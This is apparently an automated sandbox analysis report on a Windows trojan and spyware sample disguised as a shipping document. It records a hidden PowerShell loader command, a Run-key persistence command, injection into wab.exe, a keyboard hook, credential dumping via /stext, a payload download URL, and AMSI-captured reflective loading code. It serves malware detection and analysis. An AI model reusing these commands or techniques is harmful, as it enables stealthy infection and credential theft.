Source: powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.dr | String found in binary or memory: https://d.symcb.com/cps0%
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.dr | String found in binary or memory: https://d.symcb.com/rpa0
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.dr | String found in binary or memory: https://d.symcb.com/rpa0.
Source: wab.exe, 00000007.00000002.2877594254.0000000005548000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://enelltd.top/
Source: wab.exe, 00000007.00000002.2877594254.000000000550B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2877594254.0000000005548000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2890039367.0000000020E50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://enelltd.top/XpMumnKrmZynRk242.bin
Source: wab.exe, 00000007.00000002.2877594254.000000000550B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://enelltd.top/XpMumnKrmZynRk242.bino
Source: wab.exe, 00000007.00000002.2877594254.000000000550B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://enelltd.top/XpMumnKrmZynRk242.binx6
Source: powershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | HTTPS traffic detected: 172.67.215.46:443 -> 192.168.2.4:49738 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Code function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match | File source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 6544, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED

              System Summary

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Code function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | File created: C:\Windows\resources\0809
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Code function: 0_2_00406DA0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0491F000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0491F8D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0491ECB8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0491EFF4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0491B713
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0745BB58
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 12
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe | Static PE information: invalid certificate
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameacrodontism.exeV vs 586 R1 M-LINE - GEORGIA 03.05.2024.exe
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe | Binary or memory string: OriginalFilenameacrodontism.exeV vs 586 R1 M-LINE - GEORGIA 03.05.2024.exe
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.dr | Binary or memory string: OriginalFilenameacrodontism.exeV vs 586 R1 M-LINE - GEORGIA 03.05.2024.exe
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@71/43@3/3
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Code function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Code function: 0_2_004021AF CoCreateInstance
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | File created: C:\Users\user\AppData\Roaming\brosy
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6672
              Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5164
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\jmofvnb-6GMGJI
              Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2352
              Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6732
              Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5852
              Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5632
              Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4128
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | File created: C:\Users\user\AppData\Local\Temp\nsi6C90.tmp
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe | Virustotal: Detection: 13%
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | File read: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
              Source: unknown | Process created: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sreexoebkgcaarsayfwsrzyyowbcnlfz"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtkx"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fnphyzzx"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xtjcxb"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hvonqtlzm"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sptgqmvszidsb"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zaaaovlz"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\juftpowalcj"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mxslqghuzktmmh"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\owkrpbswynspxwny"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyxcqtdymwkuzcbcqpf"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: oleacc.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: shfolder.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: riched20.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: usp10.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: msls31.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: textinputframework.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: coreuicomponents.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Section loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: propsys.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: edputil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wintypes.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: appresolver.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: bcp47langs.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: slc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: userenv.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sppc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: .pdb9 source: powershell.exe, 00000001.00000002.2204647066.000000000845C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbc source: powershell.exe, 00000001.00000002.2204293333.00000000083AA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2200456150.00000000071E8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb55%y source: powershell.exe, 00000001.00000002.2200456150.00000000071E8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2204293333.00000000083AA000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match | File source: 00000001.00000002.2204905580.0000000009858000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Entwives $Skrlles $Sconcheon69), (Vintnery @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Nonaltruistic = [AppDomain]::CurrentDomain.GetAssemblies()$globa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Snaw)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Bebudede, $false).DefineType($Afregningsprisen, $Son
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04910A88 push edx; retn 0000h 1_2_04910A92
